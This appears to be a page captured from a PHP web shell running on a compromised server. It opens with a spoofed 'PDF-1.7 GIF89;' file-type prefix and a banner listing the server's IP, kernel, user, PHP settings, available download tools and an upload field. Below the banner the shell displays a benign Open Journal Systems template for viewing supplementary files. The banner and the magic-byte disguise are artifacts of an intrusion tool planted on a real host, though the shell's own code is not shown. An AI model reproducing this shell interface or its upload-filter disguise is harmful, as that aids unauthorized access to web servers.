%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/IntvJournal/templates/rt/ |
Upload File : |
{**
* templates/rt/suppFileView.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Read-only view of supplementary file information.
*
*}
{strip}
{assign var="pageTitle" value="article.suppFile"}
{include file="rt/header.tpl"}
{/strip}
<div id="suppFileView">
<h3>{$article->getLocalizedTitle()|strip_unsafe_html}</h3>
<br />
<div id="supplementarFileData">
<h3>{translate key="author.submit.supplementaryFileData"}</h3>
<table width="100%" class="data">
<tr valign="top">
<td width="20%" class="label">{translate key="common.title"}</td>
<td width="80%" class="value">{$suppFile->getSuppFileTitle()|escape|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="author.submit.suppFile.createrOrOwner"}</td>
<td class="value">{$suppFile->getSuppFileCreator()|escape|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.subject"}</td>
<td class="value">{$suppFile->getSuppFileSubject()|escape|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.type"}</td>
<td class="value">{$suppFile->getType()|escape|default:$suppFile->getSuppFileTypeOther()|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="author.submit.suppFile.briefDescription"}</td>
<td class="value">{$suppFile->getSuppFileDescription()|escape|nl2br|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.publisher"}</td>
<td class="value">{$suppFile->getSuppFilePublisher()|escape|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="author.submit.suppFile.contributorOrSponsor"}</td>
<td class="value">{$suppFile->getSuppFileSponsor()|escape|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.date"}</td>
<td class="value">{$suppFile->getDateCreated()|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.source"}</td>
<td class="value">{$suppFile->getSuppFileSource()|escape|default:"—"}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.language"}</td>
<td class="value">{$suppFile->getLanguage()|escape|default:"—"}</td>
</tr>
{foreach from=$pubIdPlugins item=pubIdPlugin}
{if $issue->getPublished()}
{assign var=pubId value=$pubIdPlugin->getPubId($suppFile)}
{else}
{assign var=pubId value=$pubIdPlugin->getPubId($suppFile, true)}{* Preview rather than assign a pubId *}
{/if}
{if $pubId}
<tr valign="top">
<td>{$pubIdPlugin->getPubIdFullName()|escape}</td>
<td>{$pubId|escape}</a></td>
</tr>
{/if}
{/foreach}
</table>
</div>
<div class="separator"></div>
<div id="supplementaryFileUpload">
<h3>{translate key="author.submit.supplementaryFileUpload"}</h3>
<table width="100%" class="data">
{if $suppFile}
{if $suppFile->getRemoteURL()}
<tr valign="top">
<td width="20%" class="label">{translate key="submission.layout.galleyRemoteURL"}</td>
<td width="80%" class="value"><a href="{$suppFile->getRemoteURL()|escape}">{$suppFile->getRemoteURL()|escape}</a></td>
</tr>
{else}
<tr valign="top">
<td width="20%" class="label">{translate key="common.fileName"}</td>
<td width="80%" class="value"><a href="{url page="article" op="downloadSuppFile" path=$articleId|to_array:$suppFile->getBestSuppFileId($currentJournal)}">{$suppFile->getFileName()|escape}</a></td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.originalFileName"}</td>
<td class="value">{$suppFile->getOriginalFileName()|escape}</td>
</tr>
<tr valign="top">
<td class="label">{translate key="common.fileSize"}</td>
<td class="value">{$suppFile->getNiceFileSize()}</td>
</tr>
<tr valign="top">
<td class="infoLabel">{translate key="common.dateUploaded"}</td>
<td class="value">{$suppFile->getDateUploaded()|date_format:$datetimeFormatShort}</td>
</tr>
</table>
{/if}
{else}
<tr valign="top">
<td colspan="2" class="noResults">{translate key="author.submit.suppFile.noFile"}</td>
</tr>
{/if}
</table>
</div>
</div>
{include file="rt/footer.tpl"}